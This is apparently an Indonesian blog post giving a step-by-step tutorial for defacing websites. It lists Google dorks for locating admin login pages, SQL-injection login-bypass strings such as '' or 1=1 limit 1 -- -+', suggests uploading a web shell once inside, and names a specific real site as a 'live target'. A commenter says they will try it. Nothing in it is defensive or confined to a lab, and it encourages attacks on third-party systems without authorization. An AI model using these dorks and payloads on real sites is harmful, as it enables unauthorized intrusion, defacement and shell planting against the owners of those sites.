Cara Deface Website Poc Bypass Admin (Live Target)
10/01/2019
2 Komentar
InfoGaes.Com Cara Deface Website POC Bypass Admin 2019 - cara deface website di android,cara deface website sekolah,cara deface website dengan mudah,cara deface website termux,cara deface website 2019,cara deface website di android termux,tutorial deface website untuk pemula,cara deface website dengan cmd,cara deface website termux,cara deface lewat android tanpa root,cara deface web go id di android,cara deface sql di android,cara deface https,cara tanam shell di android.
Bahan - Bahan :
1. Dork (Ada di bawah)
2. Shell / Uploader
3. Kopi GoodDay + Rokok :vosss
4. SABAR :3
Dork :
inurl:/login.php intext:login intext:adminsitrator
inurl:/admin/index.php intext:username
inurl:/admin/Admin.php intext:login
inurl:/administrator/login.php intext:username site:.
inurl:/login.php intext:administrator intext:login
1. Dorking ke Google. Misal gua pake dork:
inurl:/administrator/login.php intext:admin login
2. Pilih salah satu website.
3. Isi username + pass dengan
'=''or' atau ' or 1=1 limit 1 -- -+
4. Jika vuln, maka akan masuk ke Control Panel/Admin Panel web tersebut.
Jika login gagal, cari web yang lain. ( Ini gunanya SABAR :v )
5. Dan jika berhasil login, terserah kalian mau diapain :3 .
Bisa add/edit News atau mungkin kalo lagi beruntung bisa upload shell :3
NB:NGGAK SEMUA WEBSITE BISA DI BYPASS
Live Target : - https://www.ranishfinance.com/admin/login.php
Okee sekian.
Sangat bermanfaat gan, otw coba
BalasHapusJangan lupa di Follow dan Subscribe email nya Gaes biar dapat notification update artikel terbaru dr website InfoGaes.Com
Hapus